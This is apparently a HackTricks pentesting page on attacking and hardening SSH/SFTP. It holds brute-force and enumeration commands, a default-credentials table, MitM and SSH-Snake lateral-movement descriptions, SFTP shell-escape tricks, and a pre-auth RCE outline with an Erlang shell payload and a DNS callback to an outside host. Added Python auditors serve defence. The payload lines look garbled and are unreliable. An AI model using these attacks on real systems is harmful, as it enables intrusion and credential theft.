22 - Pentesting SSH/SFTP
Basic Information
SSH (Secure Shell or Secure Socket Shell) is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for preserving the confidentiality and integrity of data when accessing remote systems.
Default port: 22
22/tcp open ssh syn-ack
SSH servers:
- openSSH - OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10
- Dropbear - SSH implementation for environments with low memory and processor resources, shipped in OpenWrt
- PuTTY - SSH implementation for Windows; the client is commonly used but the server is rarely deployed
- CopSSH - implementation of OpenSSH for Windows
SSH libraries (implementing server-side):
- libssh - multiplatform C library implementing the SSHv2 protocol with bindings in Python, Perl and R; used by KDE for sftp and by GitHub for the git SSH infrastructure
- wolfSSH - SSHv2 server library written in ANSI C and targeted at embedded, RTOS and resource-constrained environments
- Apache MINA SSHD - Java library for Apache SSHD, based on Apache MINA
- paramiko - Python SSHv2 protocol library
Enumeration
Banner Grabbing
nc -vn <IP> 22
Automated ssh-audit
ssh-audit is a tool for auditing ssh server and client configuration.
https://github.com/jtesta/ssh-audit is an updated fork of https://github.com/arthepsy/ssh-audit/
Features:
- SSH1 and SSH2 protocol server support;
- analyze SSH client configuration;
- grab banner, recognize device or software and operating system, detect compression;
- gather key-exchange, host-key, encryption and message authentication code algorithms;
- output algorithm information (available since, removed/disabled, unsafe/weak/legacy, etc);
- output algorithm recommendations (append or remove based on recognized software version);
- output security information (related issues, assigned CVE list, etc);
- analyze SSH version compatibility based on algorithm information;
- historical information from OpenSSH, Dropbear SSH and libssh;
- runs on Linux and Windows;
- no dependencies
usage: ssh-audit.py [-1246pbcnjvlt] <host>
-1, --ssh1 force ssh version 1 only
-2, --ssh2 force ssh version 2 only
-4, --ipv4 enable IPv4 (order of precedence)
-6, --ipv6 enable IPv6 (order of precedence)
-p, --port=<port> port to connect
-b, --batch batch output
-c, --client-audit starts a server on port 2222 to audit client
software config (use -p to change port;
use -t to change timeout)
-n, --no-colors disable colors
-j, --json JSON output
-v, --verbose verbose output
-l, --level=<level> minimum output level (info|warn|fail)
-t, --timeout=<secs> timeout (in seconds) for connection and reading
(default: 5)
$ python3 ssh-audit <IP>
Server public SSH key
ssh-keyscan -t rsa <IP> -p <PORT>
Weak cipher algorithms
This is discovered by default by nmap. But you can also use sslscan or sslyze.
Nmap scripts
nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorithms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods
Shodan
ssh
Brute force usernames, passwords and private keys
Username Enumeration
In some versions of OpenSSH you can perform a timing attack to enumerate users. You can use a metasploit module to exploit this:
msf> use scanner/ssh/ssh_enumusers
Brute force
Some common ssh credentials here and here and below.
Private Key Brute Force
If you know some ssh private keys that could be used... let's try it. You can use the nmap script:
https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
Or the MSF auxiliary module:
msf> use scanner/ssh/ssh_identify_pubkeys
Or use ssh-keybrute.py (native python3, lightweight and has legacy algorithms enabled): snowdroppe/ssh-keybrute.
Known badkeys can be found here:
ssh-badkeys/authorized at master · rapid7/ssh-badkeys · GitHub
Weak SSH keys / Debian predictable PRNG
Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be brute-forced. Pre-generated sets of keys generated on Debian systems affected by the weak PRNG are available here: g0tmi1k/debian-ssh.
You should look there in order to search for valid keys for the victim machine.
Kerberos
crackmapexec using the ssh protocol can use the --kerberos option to authenticate via kerberos.
For more info run crackmapexec ssh --help.
Default Credentials
Vendor | Usernames | Passwords |
---|---|---|
APC | apc, device | apc |
Brocade | admin | admin123, password, brocade, fibranne |
Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
D-Link | admin, user | private, admin, user |
Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc |
HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin |
Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer |
Juniper | netscreen | netscreen |
NetApp | admin | netapp123 |
Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle |
VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default |
SSH-MitM
If you are in the local network as the victim who is going to connect to the SSH server using username and password, you could try to perform a MitM attack to steal those credentials:
Attack path:
- Traffic Redirection: The attacker diverts the victim's traffic to their machine, effectively intercepting the connection attempt to the SSH server.
- Interception and Logging: The attacker's machine acts as a proxy, capturing the user's login details by pretending to be the legitimate SSH server.
- Command Execution and Relay: Finally, the attacker's server logs the user's credentials, forwards the commands to the real SSH server, executes them, and sends the results back to the user, making the process appear seamless and legitimate.
SSH MITM does exactly what is described above.
In order to perform the actual MitM you could use techniques like ARP spoofing, DNS spoofing or others described in the Network Spoofing attacks.
SSH-Snake
If you want to traverse a network using discovered SSH private keys on systems, utilizing each private key on each system for new hosts, then SSH-Snake is what you need.
SSH-Snake performs the following tasks automatically and recursively:
- On the current system, find any SSH private keys,
- On the current system, find any hosts or destinations (user@host) that the private keys may be accepted on,
- Attempt to SSH into all of the destinations using all of the private keys discovered,
- If a destination is successfully connected to, repeat steps #1 - #4 on the connected-to system.
It's completely self-replicating and self-propagating -- and completely fileless.
Config Misconfigurations
Root login
It is common for SSH servers to allow root user login by default, which poses a significant security risk. Disabling root login is a critical step in securing the server. Unauthorized access with administrative privileges and brute-force attacks can be mitigated by making this change.
To Disable Root Login in OpenSSH:
- Edit the SSH config file with: sudoedit /etc/ssh/sshd_config
- Change the setting from #PermitRootLogin yes to PermitRootLogin no.
- Reload the configuration using: sudo systemctl daemon-reload
- Restart the SSH server to apply the changes: sudo systemctl restart sshd
SFTP Brute Force
SFTP command execution
There is a common oversight that occurs with SFTP setups, where administrators intend for users to exchange files without enabling remote shell access. Despite setting users with non-interactive shells (e.g., /usr/bin/nologin) and confining them to a specific directory, a security gap remains. Users can circumvent these restrictions by requesting the execution of a command (like /bin/bash) immediately after logging in, before their designated non-interactive shell takes over. This allows for unauthorized command execution, undermining the intended security measures.
ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0
$ ssh noraj@192.168.1.94 /bin/bash
Here is an example of a secure SFTP configuration (/etc/ssh/sshd_config - openSSH) for the user noraj:
Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no
This configuration will allow only SFTP: disabling shell access by forcing the start command and disabling TTY access, but also disabling all kinds of port forwarding or tunneling.
SFTP Tunneling
If you have access to an SFTP server you can also tunnel your traffic through it, for example using the common port forwarding:
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>
SFTP Symlink
The sftp client has the command "symlink". Therefore, if you have write permissions in some folder, you can create symlinks to other folders/files. As you are probably trapped inside a chroot this won't be especially useful for you, but, if you can access the created symlink from a non-chrooted service (for example, if you can access the symlink from the web), you could open the symlinked files through the web.
For example, to create a symlink from a new file "froot" to "/":
sftp> symlink / froot
If you can access the file "froot" via the web, you will be able to list the root ("/") folder of the system.
Authentication methods
In high security environments it is common practice to enable only key-based or two-factor authentication rather than simple password-based authentication. But often the stronger authentication methods are enabled without disabling the weaker ones. A frequent case is enabling publickey in the openSSH configuration and setting it as the default method but not disabling password. So by using the verbose mode of the SSH client an attacker can see that a weak method is enabled:
ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
For example, if an authentication failure limit is set and you never get the chance to reach the password method, you can use the PreferredAuthentications option to force using this method.
ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
Reviewing the SSH server configuration is necessary to check that only the expected methods are authorized. Using the verbose mode on the client can help to see the effectiveness of the configuration.
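As an added example (not from the original page or from OpenSSH itself), the following audits an sshd_config for the three misconfigurations covered in the Root login, SFTP command execution and Authentication methods sections: root login left enabled, an SFTP-only Match block that misses the PermitTTY/forwarding restrictions, and password or keyboard-interactive authentication left enabled next to publickey. The defaults OpenSSH applies for absent keywords are taken from the sshd_config man page; the two sample configs are constructed.

```python
# OpenSSH defaults used when a keyword is absent (assumed from the sshd_config man page).
DEFAULTS = {"permitrootlogin": "prohibit-password", "passwordauthentication": "yes",
            "kbdinteractiveauthentication": "yes", "allowtcpforwarding": "yes",
            "permittunnel": "no", "x11forwarding": "no", "permittty": "yes"}
# Keywords an SFTP-only Match block must pin to "no" besides ForceCommand internal-sftp.
SFTP_MUST_BE_NO = ("allowtcpforwarding", "permittunnel", "x11forwarding", "permittty")

def parse_sshd_config(text):
    """Return (global_settings, {match_criteria: settings}); keywords are lower-cased.
    sshd honours the first occurrence of a keyword, so later duplicates are ignored."""
    global_cfg, matches, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # strip comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)                  # "Keyword value" form only
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if key == "match":
            current = matches.setdefault(value, {})  # lines below apply conditionally
            continue
        (global_cfg if current is None else current).setdefault(key, value.lower())
    return global_cfg, matches

def effective(key, block, global_cfg):
    """Value sshd applies inside a Match block: block, then global section, then default."""
    return block.get(key, global_cfg.get(key, DEFAULTS[key]))

def audit(text):
    """Return human-readable findings; an empty list means none of the checks fired."""
    findings, (global_cfg, matches) = [], parse_sshd_config(text)
    if effective("permitrootlogin", {}, global_cfg) == "yes":
        findings.append("PermitRootLogin yes: root can log in with a password")
    if effective("passwordauthentication", {}, global_cfg) != "no":
        findings.append("PasswordAuthentication not disabled: weak method stays next to publickey")
    # ChallengeResponseAuthentication is the legacy spelling of KbdInteractiveAuthentication.
    kbd = global_cfg.get("kbdinteractiveauthentication", global_cfg.get("challengeresponseauthentication"))
    if (kbd or DEFAULTS["kbdinteractiveauthentication"]) != "no":
        findings.append("KbdInteractiveAuthentication not disabled")
    for criteria, block in matches.items():
        if block.get("forcecommand") != "internal-sftp":
            continue                                 # not an SFTP-only block
        if "chrootdirectory" not in block:
            findings.append(f"Match {criteria}: no ChrootDirectory, user sees the whole filesystem")
        for key in SFTP_MUST_BE_NO:
            if effective(key, block, global_cfg) != "no":
                findings.append(f"Match {criteria}: {key} must be no for an SFTP-only user")
    return findings

# Constructed samples: the weak layout described above and the hardened block from this page.
WEAK = ("#PermitRootLogin yes\nPermitRootLogin yes\nPubkeyAuthentication yes\n"
        "Match User noraj\n    ChrootDirectory %h\n    ForceCommand internal-sftp\n")
HARDENED = ("PermitRootLogin no\nPasswordAuthentication no\nKbdInteractiveAuthentication no\n"
            "Match User noraj\n    ChrootDirectory %h\n    ForceCommand internal-sftp\n"
            "    AllowTcpForwarding no\n    PermitTunnel no\n    X11Forwarding no\n    PermitTTY no\n")
```

Running audit(WEAK) reports five findings while audit(HARDENED) returns an empty list; pass the contents of a real /etc/ssh/sshd_config to audit() to check a host.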
Config files
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa
Fuzzing
- https://packetstormsecurity.com/files/download/71252/sshfuzz.txt
- https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2
Authentication State-Machine Bypass (Pre-Auth RCE)
Several SSH server implementations contain logic flaws in the authentication state machine that allow a client to send connection-protocol messages before authentication has completed. Because the server fails to verify that it is in the correct state, those messages are handled as if the user were fully authenticated, leading to unauthenticated code execution or session creation.
At the protocol level, any SSH message with a message number ≥ 80 (0x50) belongs to the connection layer (RFC 4254) and must only be accepted after authentication has succeeded (RFC 4252). If the server processes one of those messages while still in the SSH_AUTHENTICATION state, an attacker can immediately create a channel and request actions such as command execution, port forwarding, etc.
Generic Exploitation Steps
- Establish a TCP connection to the target's SSH port (commonly 22, but other services may expose Erlang/OTP on 2022, 830, 2222...).
- Craft a raw SSH packet:
- 4-byte packet_length (big-endian)
- 1-byte message_code ≥ 80 (e.g. SSH_MSG_CHANNEL_OPEN = 90, SSH_MSG_CHANNEL_REQUEST = 98)
- Payload that will be understood by the chosen message type
- Send the packet(s) before completing any authentication step.
- Interact with the server APIs that are now exposed pre-auth (command execution, port forwarding, file-system access, ...).
Python proof-of-concept outline:
import socket, struct
HOST, PORT = '10.10.10.10', 22
s = socket.create_connection((HOST, PORT))
# skip version exchange for brevity - send your own client banner then read server banner
# ... key exchange can be skipped on vulnerable Erlang/OTP because the bug is hit immediately after the banner
# Packet: len(1)=1, SSH_MSG_CHANNEL_OPEN (90)
pkt = struct.pack('>I', 1) + b'\x5a' # 0x5a = 90
s.sendall(pkt)
# additional CHANNEL_REQUEST packets can follow to run commands
In practice you will need to perform (or skip) the key exchange depending on the target implementation, but no authentication is ever performed.
Erlang/OTP sshd (CVE-2025-32433)
- Affected versions: OTP < 27.3.3, 26.2.5.11, 25.3.2.20
- Root cause: the native Erlang SSH daemon does not validate the current state before calling ssh_connection:handle_msg/2. Therefore any packet with message code 80-255 reaches the connection handler while the session is still in the userauth state.
- Impact: unauthenticated remote code execution (the daemon frequently runs as root on embedded/OT devices).
Example payload that spawns a reverse shell bound to the attacker-controlled channel:
% open a channel first ... then:
execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid, true}]).").
Blind RCE / out-of-band detection can be done via DNS:
execSinet:gethostbyname("<random>.dns.outbound.watchtowr.com").Zsession
Detection & Mitigation:
- Inspect SSH traffic: drop any packet with message number ≥ 80 observed before authentication.
- Upgrade Erlang/OTP to 27.3.3 / 26.2.5.11 / 25.3.2.20 or newer.
- Restrict exposure of management ports (22/2022/830/2222), especially on OT devices.
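The first mitigation bullet as a concrete check, added here as an example that is not part of the original page or of any tool it mentions: a parser for cleartext SSH binary packets (RFC 4253 framing) that tracks whether a SSH_MSG_USERAUTH_SUCCESS has been seen and flags any client message with number ≥ 80 that precedes it, plus frames whose framing leaves no room for a message code, like the one in the PoC outline above. Only the unencrypted part of a session (before NEWKEYS) can be inspected this way; all sample frames are constructed.

```python
SSH_MSG_USERAUTH_SUCCESS = 52
CONNECTION_LAYER_MIN = 80     # RFC 4254 message numbers start at 80

def ssh_string(data):
    """Encode an SSH 'string': uint32 length prefix followed by the bytes."""
    return len(data).to_bytes(4, "big") + data

def build_packet(payload, block=8):
    """Frame a payload as an unencrypted RFC 4253 section 6 binary packet (sample input only)."""
    pad = block - ((len(payload) + 5) % block)
    if pad < 4:               # the RFC requires at least four bytes of padding
        pad += block
    return (len(payload) + 1 + pad).to_bytes(4, "big") + bytes([pad]) + payload + bytes(pad)

def parse_packet(raw):
    """Return (message_code, note); note is '' for a well-formed frame, else why it is suspect."""
    if len(raw) < 5:
        return None, "truncated frame"
    pkt_len = int.from_bytes(raw[:4], "big")
    body = raw[4:4 + pkt_len]
    if len(body) != pkt_len:
        return None, "packet_length disagrees with the bytes on the wire"
    pad_len = body[0]
    payload = body[1:pkt_len - pad_len]
    if pad_len < 4 or not payload:
        # The PoC outline above sends exactly this shape: no room is left for a message code.
        return None, "framing leaves no valid payload"
    return payload[0], ""

def audit_session(frames):
    """frames: ordered (direction, raw_frame) pairs, 'C' client->server, 'S' server->client.
    Only the cleartext prefix of a session can be parsed; after SSH_MSG_NEWKEYS the stream
    is encrypted, so the right-after-banner variant described above is the visible case."""
    authenticated, findings = False, []
    for idx, (direction, raw) in enumerate(frames):
        code, note = parse_packet(raw)
        if note:
            findings.append(f"#{idx} {direction}: malformed frame ({note})")
        elif direction == "S" and code == SSH_MSG_USERAUTH_SUCCESS:
            authenticated = True
        elif direction == "C" and code >= CONNECTION_LAYER_MIN and not authenticated:
            findings.append(f"#{idx} C: connection-layer message {code} before authentication")
    return findings

# Constructed samples: a minimal KEXINIT (20) with empty name-lists, a CHANNEL_OPEN (90) for a
# "session", and the USERAUTH_REQUEST (50) / USERAUTH_SUCCESS (52) pair of a normal login.
KEXINIT = build_packet(bytes([20]) + bytes(16) + bytes(4) * 10 + b"\x00" + bytes(4))
CHANNEL_OPEN = build_packet(bytes([90]) + ssh_string(b"session") + (0).to_bytes(4, "big")
                            + (32768).to_bytes(4, "big") + (16384).to_bytes(4, "big"))
NORMAL_LOGIN = [("C", KEXINIT), ("C", build_packet(bytes([50]))),
                ("S", build_packet(bytes([52]))), ("C", CHANNEL_OPEN)]
PRE_AUTH_CHANNEL = [("C", KEXINIT), ("C", CHANNEL_OPEN)]
POC_FRAME = [("C", b"\x00\x00\x00\x01\x5a")]     # the bytes the PoC outline on this page sends
```

audit_session(NORMAL_LOGIN) returns an empty list, while PRE_AUTH_CHANNEL and POC_FRAME each produce one finding; feed it the reassembled frames of a captured TCP stream to apply the rule to real traffic.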
Other Implementations Affected
- libssh 0.6 - 0.8 (server side) - CVE-2018-10933 - accepts an unauthenticated SSH_MSG_USERAUTH_SUCCESS sent by the client, effectively the inverse logic flaw.
The common lesson is that any deviation from the RFC-mandated state transitions can be fatal; when reviewing or fuzzing SSH daemons pay special attention to the state-machine enforcement.
HackTricks Automatic Commands
Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening
Entry_1:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh
Entry_2:
Name: consoleless msf enumeration
Description: SSH enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'